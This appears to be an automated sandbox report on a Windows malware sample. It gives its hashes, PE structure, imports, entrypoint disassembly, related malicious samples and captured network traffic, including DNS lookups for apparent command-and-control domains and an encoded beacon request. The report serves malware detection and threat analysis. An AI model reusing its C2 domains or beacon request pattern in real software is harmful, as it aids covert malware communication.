Match	Associated Sample Name / URL	SHA 256	Detection	Link
74.6.231.21	GLpkbbRAp2.dll	Get hash	malicious	Browse
	youNextNext.dll	Get hash	malicious	Browse
	bebys10.dll	Get hash	malicious	Browse
	loveTubeLike.dll	Get hash	malicious	Browse
	zuroq1.dll	Get hash	malicious	Browse
	kANwTlkiJp.dll	Get hash	malicious	Browse
	gVuD2n1r5v.dll	Get hash	malicious	Browse
	BQIyt2B7Im.dll	Get hash	malicious	Browse
	uj8A47Ew7u.dll	Get hash	malicious	Browse
	mqxJYyvnoI.dll	Get hash	malicious	Browse
	zq8o6y1z60.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Bulz.383129.23206.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Bulz.383129.29566.exe	Get hash	malicious	Browse
	File_868646.xlsb	Get hash	malicious	Browse
	jvBfrKaF4S.xlsb	Get hash	malicious	Browse
	COQV159DNC.xlsb	Get hash	malicious	Browse
	aJA1Ldh1iR.xlsb	Get hash	malicious	Browse
	AdGhJBWo7O.xlsb	Get hash	malicious	Browse
	B2v9PZCsbT.xlsb	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.GenericKDZ.73289.4020.xlsb	Get hash	malicious	Browse
87.248.100.216	FpYf5EGDO9.exe	Get hash	malicious	Browse
	anIV2qJeLD.exe	Get hash	malicious	Browse
	0MGLPJiSa5.dll	Get hash	malicious	Browse
	Fuutbqvhmc.dll	Get hash	malicious	Browse
	X4V4jFmFhO.dll	Get hash	malicious	Browse
	GLpkbbRAp2.dll	Get hash	malicious	Browse
	bebys12.dll	Get hash	malicious	Browse
	loveTubeLike.dll	Get hash	malicious	Browse
	zuroq8.dll	Get hash	malicious	Browse
	zuroq1.dll	Get hash	malicious	Browse
	nextNextLike.dll	Get hash	malicious	Browse
	gVuD2n1r5v.dll	Get hash	malicious	Browse
	BQIyt2B7Im.dll	Get hash	malicious	Browse
	52k0qe3yt3.dll	Get hash	malicious	Browse
	BQIyt2B7Im.dll	Get hash	malicious	Browse
	SayEjNMwtQ.dll	Get hash	malicious	Browse
	uj8A47Ew7u.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W64.Bzrloader.IEldorado.25041.dll	Get hash	malicious	Browse
	powTubeDoor.dll	Get hash	malicious	Browse
	WGEcMZQA.dll	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
new-fp-shed.wg1.b.yahoo.com	FpYf5EGDO9.exe	Get hash	malicious	Browse	87.248.100.216
	anIV2qJeLD.exe	Get hash	malicious	Browse	87.248.100.216
	0MGLPJiSa5.dll	Get hash	malicious	Browse	87.248.100.216
	loveTubeLike.dll	Get hash	malicious	Browse	87.248.100.215
	Fuutbqvhmc.dll	Get hash	malicious	Browse	87.248.100.215
	Antic Cracked.exe	Get hash	malicious	Browse	87.248.100.215
	nesfooF2Q1.exe	Get hash	malicious	Browse	87.248.100.215
	X4V4jFmFhO.dll	Get hash	malicious	Browse	87.248.100.216
	GLpkbbRAp2.dll	Get hash	malicious	Browse	87.248.100.216
	youNextNext.dll	Get hash	malicious	Browse	87.248.100.215
	bebys10.dll	Get hash	malicious	Browse	87.248.100.215
	bebys12.dll	Get hash	malicious	Browse	87.248.100.216
	loveTubeLike.dll	Get hash	malicious	Browse	87.248.100.216
	zuroq8.dll	Get hash	malicious	Browse	87.248.100.216
	zuroq1.dll	Get hash	malicious	Browse	87.248.100.216
	nextNextLike.dll	Get hash	malicious	Browse	87.248.100.215
	TFIw2EIiZh.exe	Get hash	malicious	Browse	87.248.100.215
	Solicitor Inquiry No. 001_4921 - UK.xls	Get hash	malicious	Browse	87.248.100.215
	kANwTlkiJp.dll	Get hash	malicious	Browse	87.248.100.215
	gVuD2n1r5v.dll	Get hash	malicious	Browse	87.248.100.215

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
YAHOO-NE1US	loveTubeLike.dll	Get hash	malicious	Browse	74.6.231.20
	Fuutbqvhmc.dll	Get hash	malicious	Browse	74.6.231.20
	mips	Get hash	malicious	Browse	98.137.87.76
	GLpkbbRAp2.dll	Get hash	malicious	Browse	74.6.231.21
	youNextNext.dll	Get hash	malicious	Browse	74.6.231.21
	bebys10.dll	Get hash	malicious	Browse	74.6.231.21
	bebys12.dll	Get hash	malicious	Browse	74.6.231.20
	loveTubeLike.dll	Get hash	malicious	Browse	74.6.231.21
	zuroq1.dll	Get hash	malicious	Browse	74.6.231.21
	nextNextLike.dll	Get hash	malicious	Browse	74.6.231.20
	kANwTlkiJp.dll	Get hash	malicious	Browse	74.6.231.21
	gVuD2n1r5v.dll	Get hash	malicious	Browse	74.6.231.21
	BQIyt2B7Im.dll	Get hash	malicious	Browse	74.6.231.21
	BQIyt2B7Im.dll	Get hash	malicious	Browse	74.6.231.20
	uj8A47Ew7u.dll	Get hash	malicious	Browse	74.6.231.21
	EWTeT0uzHW	Get hash	malicious	Browse	98.139.7.81
	OcO4KUSfwn	Get hash	malicious	Browse	98.137.87.66
	mqxJYyvnoI.dll	Get hash	malicious	Browse	74.6.231.21
	Tsunami.x86	Get hash	malicious	Browse	98.137.87.95
	zq8o6y1z60.dll	Get hash	malicious	Browse	74.6.231.21

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	XP-SN-7843884.htm	Get hash	malicious	Browse	74.6.231.21 87.248.100.216
	XP-SN-8324655.htm	Get hash	malicious	Browse	74.6.231.21 87.248.100.216
	new-1834138397.xls	Get hash	malicious	Browse	74.6.231.21 87.248.100.216
	1.htm	Get hash	malicious	Browse	74.6.231.21 87.248.100.216
	FACTURAS.exe	Get hash	malicious	Browse	74.6.231.21 87.248.100.216
	new-1179494065.xls	Get hash	malicious	Browse	74.6.231.21 87.248.100.216
	Arrival Notice, CIA Awb Inv Form.pdf.exe	Get hash	malicious	Browse	74.6.231.21 87.248.100.216
	TT-PRIME USD242,357,59.ppam	Get hash	malicious	Browse	74.6.231.21 87.248.100.216
	chase.xls	Get hash	malicious	Browse	74.6.231.21 87.248.100.216
	Statement from QNB.exe	Get hash	malicious	Browse	74.6.231.21 87.248.100.216
	private-1915056036.xls	Get hash	malicious	Browse	74.6.231.21 87.248.100.216
	private-1910485378.xls	Get hash	malicious	Browse	74.6.231.21 87.248.100.216
	doc201002124110300200.exe	Get hash	malicious	Browse	74.6.231.21 87.248.100.216
	t 2021.HtML	Get hash	malicious	Browse	74.6.231.21 87.248.100.216
	INVOICE - FIRST 2 CONTAINERS 1110.docx	Get hash	malicious	Browse	74.6.231.21 87.248.100.216
	INVOICE - FIRST 2 CONTAINERS 1110.docx	Get hash	malicious	Browse	74.6.231.21 87.248.100.216
	Justificante.exe	Get hash	malicious	Browse	74.6.231.21 87.248.100.216
	muhammadbad.html	Get hash	malicious	Browse	74.6.231.21 87.248.100.216
	MtCsSK9TK2.exe	Get hash	malicious	Browse	74.6.231.21 87.248.100.216
	0331C7BCA665F36513377FC301CBB32822FF35F925115.exe	Get hash	malicious	Browse	74.6.231.21 87.248.100.216

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.862869752671554
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	R0xLHA2mT5.exe
File size:	298496
MD5:	9f3b8462c508884f6966f3ad4a275799
SHA1:	6288e611de585a6dc56c6399ef03012698d60392
SHA256:	a548ac73d6acb5a260cb2e1760946c37ce94d89f3cd2a5b126e266e007dfc543
SHA512:	d9d529ed258ffaf33f729cb822fc602748772df8f8710a4a77e9d4fbea02658fd0c9a0e4d1f920c99230551705c0e643e4eac5bcca0b008f5cb48679e56c1a37
SSDEEP:	6144:0fcUtwkDhJYbsB/qMZSXuZet0yyen73jF20+Mpbz/CyU:0U2n1B/3ZSXuZet0yye7w0+MpC
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0.r"t..qt..qt..q...q]..q...qe..q...q...q}..q...qt..qq..q...qu..q...qu..q...qu..qRicht..q........PE..L.....``...................

File Icon


Icon Hash:	a2e8e8e8aaa2a488

Static PE Info

General
Entrypoint:	0x417cf0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:	0x6060D3B3 [Sun Mar 28 19:06:27 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	62f526399c5bc6ba1d2354b3cc3131f3

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
call 00007FA350B87BBBh
call 00007FA350B878C6h
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov edi, edi
push ebp
mov ebp, esp
push FFFFFFFEh
push 0042FAD0h
push 0041BF10h
mov eax, dword ptr fs:[00000000h]
push eax
add esp, FFFFFF98h
push ebx
push esi
push edi
mov eax, dword ptr [00432064h]
xor dword ptr [ebp-08h], eax
xor eax, ebp
push eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
mov dword ptr [ebp-18h], esp
mov dword ptr [ebp-70h], 00000000h
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [00401368h]
cmp dword ptr [01FB5ABCh], 00000000h
jne 00007FA350B878C0h
push 00000000h
push 00000000h
push 00000001h
push 00000000h
call dword ptr [00401364h]
call 00007FA350B87A43h
mov dword ptr [ebp-6Ch], eax
call 00007FA350B8BA0Bh
test eax, eax
jne 00007FA350B878BCh
push 0000001Ch
call 00007FA350B87A00h
add esp, 04h
call 00007FA350B8B368h
test eax, eax
jne 00007FA350B878BCh
push 00000010h
call 00007FA350B879EDh
add esp, 04h
push 00000001h
call 00007FA350B8B2B3h
add esp, 04h
call 00007FA350B88F6Bh
mov dword ptr [ebp-04h], 00000000h
call 00007FA350B88B4Fh
test eax, eax

Rich Headers

Programming Language:

[LNK] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[C++] VS2010 build 30319
[RES] VS2010 build 30319
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x300b4	0x78	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1bb7000	0x5470	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1bbd000	0x17fc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1450	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x17b28	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x408	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x30970	0x30a00	False	0.607316436375	data	7.03993935197	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x32000	0x1b84ac0	0x1400	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x1bb7000	0x5470	0x5600	False	0.609783793605	data	5.95998340963	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x1bbd000	0x115e0	0x11600	False	0.0756379271583	data	0.97914473251	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
YONAMIKORUFENI	0x1bba700	0xee8	ASCII text, with very long lines, with no line terminators	Spanish	Paraguay
RT_CURSOR	0x1bbb5e8	0x8a8	dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"	Divehi; Dhivehi; Maldivian	Maldives
RT_ICON	0x1bb7330	0x8a8	data	Spanish	Paraguay
RT_ICON	0x1bb7bd8	0x6c8	data	Spanish	Paraguay
RT_ICON	0x1bb82a0	0x568	GLS_BINARY_LSB_FIRST	Spanish	Paraguay
RT_ICON	0x1bb8808	0x10a8	data	Spanish	Paraguay
RT_ICON	0x1bb98b0	0x988	data	Spanish	Paraguay
RT_ICON	0x1bba238	0x468	GLS_BINARY_LSB_FIRST	Spanish	Paraguay
RT_STRING	0x1bbbea8	0xfc	data	Divehi; Dhivehi; Maldivian	Maldives
RT_STRING	0x1bbbfa8	0x26c	data	Divehi; Dhivehi; Maldivian	Maldives
RT_STRING	0x1bbc218	0x254	data	Divehi; Dhivehi; Maldivian	Maldives
RT_GROUP_CURSOR	0x1bbbe90	0x14	data	Divehi; Dhivehi; Maldivian	Maldives
RT_GROUP_ICON	0x1bba6a0	0x5a	data	Spanish	Paraguay

Imports

DLL	Import
KERNEL32.dll	GetNumaNodeProcessorMask, SetCriticalSectionSpinCount, SearchPathW, SetInformationJobObject, lstrcmpA, FindFirstFileW, SetThreadContext, EnumCalendarInfoA, WriteConsoleInputW, IsBadStringPtrW, lstrlenA, EnumDateFormatsExW, CopyFileExW, GetNumaProcessorNode, TlsGetValue, SetLocalTime, UnmapViewOfFile, MoveFileExA, CommConfigDialogA, GetNumberOfConsoleInputEvents, GetConsoleAliasExesLengthA, SetErrorMode, FindResourceW, BuildCommDCBAndTimeoutsA, FreeLibrary, DeleteVolumeMountPointA, SetUnhandledExceptionFilter, LoadLibraryExW, SetDllDirectoryW, InterlockedIncrement, GetQueuedCompletionStatus, VerSetConditionMask, MoveFileExW, ReadConsoleA, InterlockedDecrement, WaitNamedPipeA, SetMailslotInfo, SetConsoleActiveScreenBuffer, WritePrivateProfileSectionA, SetDefaultCommConfigW, GetSystemWindowsDirectoryW, SetEnvironmentVariableW, CreateJobObjectW, SignalObjectAndWait, AddConsoleAliasW, GetComputerNameW, SetEvent, SetThreadExecutionState, OpenSemaphoreA, CreateHardLinkA, GetFileAttributesExA, _lclose, GetModuleHandleW, GetTickCount, GetCommConfig, GetProcessHeap, IsBadReadPtr, GetConsoleAliasesLengthA, GetSystemTimeAsFileTime, GetPrivateProfileStringW, GetConsoleTitleA, CreateRemoteThread, GetCompressedFileSizeW, EnumTimeFormatsA, GetSystemWow64DirectoryA, SetCommTimeouts, CreateActCtxW, InitializeCriticalSection, GetProcessTimes, TlsSetValue, AllocateUserPhysicalPages, OpenProcess, FindResourceExA, GlobalAlloc, GetPrivateProfileIntA, LoadLibraryW, GetConsoleMode, FatalAppExitW, GetThreadSelectorEntry, AssignProcessToJobObject, GetCalendarInfoA, ReadFileScatter, SetSystemTimeAdjustment, SetVolumeMountPointA, ReadConsoleOutputW, SetConsoleCP, InterlockedPopEntrySList, LeaveCriticalSection, GetFileAttributesA, GlobalFlags, lstrcpynW, GetNamedPipeInfo, HeapValidate, GetVolumePathNamesForVolumeNameW, CreateSemaphoreA, SetConsoleCursorPosition, VerifyVersionInfoA, HeapQueryInformation, WritePrivateProfileSectionW, TerminateProcess, GetAtomNameW, FileTimeToSystemTime, UnregisterWait, GetModuleFileNameW, lstrcatA, GetBinaryTypeW, CompareStringW, ExitThread, GetVolumePathNameA, lstrlenW, SetConsoleTitleA, WritePrivateProfileStringW, GlobalUnlock, VirtualUnlock, GetTempPathW, GetStringTypeExA, GetNamedPipeHandleStateW, GetLargestConsoleWindowSize, GetPrivateProfileIntW, InterlockedExchange, ReleaseActCtx, SetCurrentDirectoryA, GetStdHandle, FindFirstFileA, GetLastError, ChangeTimerQueueTimer, BackupRead, BindIoCompletionCallback, GetProcAddress, FindVolumeMountPointClose, GetLongPathNameA, VirtualAlloc, HeapSize, SetFirmwareEnvironmentVariableW, CreateNamedPipeA, CreateJobSet, LocalLock, LockFileEx, VerLanguageNameW, BuildCommDCBW, DefineDosDeviceA, FindClose, GetPrivateProfileStringA, LoadLibraryA, Process32FirstW, OpenMutexA, ProcessIdToSessionId, MoveFileA, GetExitCodeThread, GetNumberFormatW, SetFileApisToANSI, QueryDosDeviceW, SetConsoleWindowInfo, SetThreadIdealProcessor, HeapWalk, GetPrivateProfileStructA, GetTapeParameters, GetVolumePathNamesForVolumeNameA, GetModuleFileNameA, GetDefaultCommConfigA, FindNextFileA, WriteProfileStringA, WTSGetActiveConsoleSessionId, EnumDateFormatsA, WaitCommEvent, _lread, FindFirstChangeNotificationA, GetProcessShutdownParameters, QueueUserWorkItem, ContinueDebugEvent, IsDebuggerPresent, GetProcessAffinityMask, FatalExit, FreeEnvironmentStringsW, EnumResourceNamesA, WriteProfileStringW, EnumDateFormatsW, FatalAppExitA, PeekConsoleInputA, DeleteCriticalSection, WriteConsoleOutputAttribute, OutputDebugStringA, GetCPInfoExA, DuplicateHandle, FindFirstVolumeA, GetVersionExA, ReadConsoleInputW, TlsAlloc, TerminateJobObject, CloseHandle, GetVersion, DeleteTimerQueueTimer, GlobalAddAtomW, SetFileValidData, FindActCtxSectionStringW, ResetWriteWatch, UnregisterWaitEx, ReadConsoleOutputCharacterW, TlsFree, GetProfileSectionW, EnumSystemLocalesW, lstrcpyW, CopyFileExA, CreateFileW, SetStdHandle, GetPrivateProfileSectionNamesW, EnumResourceNamesW, GetThreadContext, IsDBCSLeadByte, GetFullPathNameA, RaiseException, GetCommandLineW, HeapSetInformation, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetCurrentProcessId, DecodePointer, ExitProcess, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, EncodePointer, SetLastError, HeapCreate, WriteFile, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, EnterCriticalSection, GetCurrentProcess, UnhandledExceptionFilter, HeapAlloc, HeapReAlloc, HeapFree, RtlUnwind, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetStringTypeW, WriteConsoleW, OutputDebugStringW, IsProcessorFeaturePresent, SetFilePointer, GetConsoleCP, FlushFileBuffers
USER32.dll	GetMessageTime
GDI32.dll	GetBitmapBits
ADVAPI32.dll	InitiateSystemShutdownA, GetFileSecurityW
MSIMG32.dll	AlphaBlend

Possible Origin

Language of compilation system	Country where language is spoken	Map
Spanish	Paraguay
Divehi; Dhivehi; Maldivian	Maldives

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 24, 2021 18:24:25.064677000 CET	49720	443	192.168.2.3	74.6.231.21
Nov 24, 2021 18:24:25.064727068 CET	443	49720	74.6.231.21	192.168.2.3
Nov 24, 2021 18:24:25.064826965 CET	49720	443	192.168.2.3	74.6.231.21
Nov 24, 2021 18:24:25.084196091 CET	49720	443	192.168.2.3	74.6.231.21
Nov 24, 2021 18:24:25.084261894 CET	443	49720	74.6.231.21	192.168.2.3
Nov 24, 2021 18:24:25.350553036 CET	443	49720	74.6.231.21	192.168.2.3
Nov 24, 2021 18:24:25.350639105 CET	49720	443	192.168.2.3	74.6.231.21
Nov 24, 2021 18:24:25.605936050 CET	49720	443	192.168.2.3	74.6.231.21
Nov 24, 2021 18:24:25.605972052 CET	443	49720	74.6.231.21	192.168.2.3
Nov 24, 2021 18:24:25.606558084 CET	443	49720	74.6.231.21	192.168.2.3
Nov 24, 2021 18:24:25.606643915 CET	49720	443	192.168.2.3	74.6.231.21
Nov 24, 2021 18:24:25.609898090 CET	49720	443	192.168.2.3	74.6.231.21
Nov 24, 2021 18:24:25.652873993 CET	443	49720	74.6.231.21	192.168.2.3
Nov 24, 2021 18:24:25.739583015 CET	443	49720	74.6.231.21	192.168.2.3
Nov 24, 2021 18:24:25.739701033 CET	443	49720	74.6.231.21	192.168.2.3
Nov 24, 2021 18:24:25.739703894 CET	49720	443	192.168.2.3	74.6.231.21
Nov 24, 2021 18:24:25.739758968 CET	49720	443	192.168.2.3	74.6.231.21
Nov 24, 2021 18:24:25.788775921 CET	49720	443	192.168.2.3	74.6.231.21
Nov 24, 2021 18:24:25.788804054 CET	443	49720	74.6.231.21	192.168.2.3
Nov 24, 2021 18:24:25.822021008 CET	49721	443	192.168.2.3	87.248.100.216
Nov 24, 2021 18:24:25.822061062 CET	443	49721	87.248.100.216	192.168.2.3
Nov 24, 2021 18:24:25.822155952 CET	49721	443	192.168.2.3	87.248.100.216
Nov 24, 2021 18:24:25.822999954 CET	49721	443	192.168.2.3	87.248.100.216
Nov 24, 2021 18:24:25.823020935 CET	443	49721	87.248.100.216	192.168.2.3
Nov 24, 2021 18:24:25.910984993 CET	443	49721	87.248.100.216	192.168.2.3
Nov 24, 2021 18:24:25.911099911 CET	49721	443	192.168.2.3	87.248.100.216
Nov 24, 2021 18:24:25.929397106 CET	49721	443	192.168.2.3	87.248.100.216
Nov 24, 2021 18:24:25.929425001 CET	443	49721	87.248.100.216	192.168.2.3
Nov 24, 2021 18:24:25.929687977 CET	443	49721	87.248.100.216	192.168.2.3
Nov 24, 2021 18:24:25.929764032 CET	49721	443	192.168.2.3	87.248.100.216
Nov 24, 2021 18:24:25.930593014 CET	49721	443	192.168.2.3	87.248.100.216
Nov 24, 2021 18:24:25.972871065 CET	443	49721	87.248.100.216	192.168.2.3
Nov 24, 2021 18:24:26.150295019 CET	443	49721	87.248.100.216	192.168.2.3
Nov 24, 2021 18:24:26.150407076 CET	49721	443	192.168.2.3	87.248.100.216
Nov 24, 2021 18:24:26.150423050 CET	443	49721	87.248.100.216	192.168.2.3
Nov 24, 2021 18:24:26.150445938 CET	443	49721	87.248.100.216	192.168.2.3
Nov 24, 2021 18:24:26.150509119 CET	49721	443	192.168.2.3	87.248.100.216
Nov 24, 2021 18:24:26.150522947 CET	49721	443	192.168.2.3	87.248.100.216
Nov 24, 2021 18:24:26.152529001 CET	49721	443	192.168.2.3	87.248.100.216
Nov 24, 2021 18:24:26.152566910 CET	443	49721	87.248.100.216	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 24, 2021 18:24:25.005891085 CET	59026	53	192.168.2.3	8.8.8.8
Nov 24, 2021 18:24:25.025409937 CET	53	59026	8.8.8.8	192.168.2.3
Nov 24, 2021 18:24:25.798044920 CET	49572	53	192.168.2.3	8.8.8.8
Nov 24, 2021 18:24:25.818571091 CET	53	49572	8.8.8.8	192.168.2.3
Nov 24, 2021 18:24:46.316181898 CET	53615	53	192.168.2.3	8.8.8.8
Nov 24, 2021 18:24:46.338320017 CET	53	53615	8.8.8.8	192.168.2.3
Nov 24, 2021 18:26:06.369411945 CET	60352	53	192.168.2.3	8.8.8.8
Nov 24, 2021 18:26:06.391844034 CET	53	60352	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 24, 2021 18:24:25.005891085 CET	192.168.2.3	8.8.8.8	0x4a4	Standard query (0)	yahoo.com	A (IP address)	IN (0x0001)
Nov 24, 2021 18:24:25.798044920 CET	192.168.2.3	8.8.8.8	0xe878	Standard query (0)	www.yahoo.com	A (IP address)	IN (0x0001)
Nov 24, 2021 18:24:46.316181898 CET	192.168.2.3	8.8.8.8	0x802d	Standard query (0)	soderunovos.website	A (IP address)	IN (0x0001)
Nov 24, 2021 18:26:06.369411945 CET	192.168.2.3	8.8.8.8	0xd72f	Standard query (0)	qoderunovos.website	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 24, 2021 18:24:25.025409937 CET	8.8.8.8	192.168.2.3	0x4a4	No error (0)	yahoo.com		74.6.231.21	A (IP address)	IN (0x0001)
Nov 24, 2021 18:24:25.025409937 CET	8.8.8.8	192.168.2.3	0x4a4	No error (0)	yahoo.com		74.6.143.26	A (IP address)	IN (0x0001)
Nov 24, 2021 18:24:25.025409937 CET	8.8.8.8	192.168.2.3	0x4a4	No error (0)	yahoo.com		74.6.143.25	A (IP address)	IN (0x0001)
Nov 24, 2021 18:24:25.025409937 CET	8.8.8.8	192.168.2.3	0x4a4	No error (0)	yahoo.com		74.6.231.20	A (IP address)	IN (0x0001)
Nov 24, 2021 18:24:25.025409937 CET	8.8.8.8	192.168.2.3	0x4a4	No error (0)	yahoo.com		98.137.11.164	A (IP address)	IN (0x0001)
Nov 24, 2021 18:24:25.025409937 CET	8.8.8.8	192.168.2.3	0x4a4	No error (0)	yahoo.com		98.137.11.163	A (IP address)	IN (0x0001)
Nov 24, 2021 18:24:25.818571091 CET	8.8.8.8	192.168.2.3	0xe878	No error (0)	www.yahoo.com	new-fp-shed.wg1.b.yahoo.com		CNAME (Canonical name)	IN (0x0001)
Nov 24, 2021 18:24:25.818571091 CET	8.8.8.8	192.168.2.3	0xe878	No error (0)	new-fp-shed.wg1.b.yahoo.com		87.248.100.216	A (IP address)	IN (0x0001)
Nov 24, 2021 18:24:25.818571091 CET	8.8.8.8	192.168.2.3	0xe878	No error (0)	new-fp-shed.wg1.b.yahoo.com		87.248.100.215	A (IP address)	IN (0x0001)
Nov 24, 2021 18:24:46.338320017 CET	8.8.8.8	192.168.2.3	0x802d	Name error (3)	soderunovos.website	none	none	A (IP address)	IN (0x0001)
Nov 24, 2021 18:26:06.391844034 CET	8.8.8.8	192.168.2.3	0xd72f	Name error (3)	qoderunovos.website	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

yahoo.com

www.yahoo.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49720	74.6.231.21	443	C:\Users\user\Desktop\R0xLHA2mT5.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-24 17:24:25 UTC	0	OUT	GET /jdraw/bxL1xwjyIDF/WhnrXJWmz2Twl8/gY8V0mj8FFAgQDgBa_2Fr/ju3YDzGHJQvJy7Ul/WNFipJkcZdncwpj/ywnxu6MUxONK0Xvi9f/ucETuIFdm/wokZPT9eFRDqyFNdNZik/FUVXSPqAP_2FwjH1nuX/3xMD5fDEH8K9cekhYWTKgU/lNhM0C6AYaGMU/wTNgbH70ZfWGyVix/60.crw HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: yahoo.com Connection: Keep-Alive Cache-Control: no-cache
2021-11-24 17:24:25 UTC	0	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2021 17:24:25 GMT Connection: keep-alive Strict-Transport-Security: max-age=31536000 Server: ATS Cache-Control: no-store, no-cache Content-Type: text/html Content-Language: en X-Frame-Options: SAMEORIGIN Set-Cookie: B=0kqfhp5gpsta9&b=3&s=ki; expires=Thu, 24-Nov-2022 17:24:25 GMT; path=/; domain=.yahoo.com Expect-CT: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only" Referrer-Policy: no-referrer-when-downgrade X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Location: https://www.yahoo.com/jdraw/bxL1xwjyIDF/WhnrXJWmz2Twl8/gY8V0mj8FFAgQDgBa_2Fr/ju3YDzGHJQvJy7Ul/WNFipJkcZdncwpj/ywnxu6MUxONK0Xvi9f/ucETuIFdm/wokZPT9eFRDqyFNdNZik/FUVXSPqAP_2FwjH1nuX/3xMD5fDEH8K9cekhYWTKgU/lNhM0C6AYaGMU/wTNgbH70ZfWGyVix/60.crw Content-Length: 8
2021-11-24 17:24:25 UTC	1	IN	Data Raw: 72 65 64 69 72 65 63 74 Data Ascii: redirect

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49721	87.248.100.216	443	C:\Users\user\Desktop\R0xLHA2mT5.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-24 17:24:25 UTC	1	OUT	GET /jdraw/bxL1xwjyIDF/WhnrXJWmz2Twl8/gY8V0mj8FFAgQDgBa_2Fr/ju3YDzGHJQvJy7Ul/WNFipJkcZdncwpj/ywnxu6MUxONK0Xvi9f/ucETuIFdm/wokZPT9eFRDqyFNdNZik/FUVXSPqAP_2FwjH1nuX/3xMD5fDEH8K9cekhYWTKgU/lNhM0C6AYaGMU/wTNgbH70ZfWGyVix/60.crw HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Connection: Keep-Alive Cache-Control: no-cache Host: www.yahoo.com Cookie: B=0kqfhp5gpsta9&b=3&s=ki
